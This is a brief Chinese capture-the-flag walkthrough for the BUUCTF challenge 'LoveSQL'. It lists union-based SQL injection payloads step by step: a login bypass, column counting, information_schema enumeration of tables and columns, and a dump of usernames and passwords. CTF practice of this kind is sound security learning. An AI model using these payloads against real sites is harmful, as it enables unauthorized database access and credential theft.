BUUCTF刷题记录
[极客大挑战 2019]LoveSQL
万能密码登录
不直接显示密码
开始注入
1’ or 1=1 order by 3#
1’ or 1=1 order by 4#
说明字段为3
开始判断回显点
-1’ union select 1,2,3#
查库查水表
-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘l0ve1ysq1’#
-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘geekuser’#
都是 id,username,password
-1’ union select 1,group_concat(id,username,password),3 from l0ve1ysq1#
有点乱可以查看源代码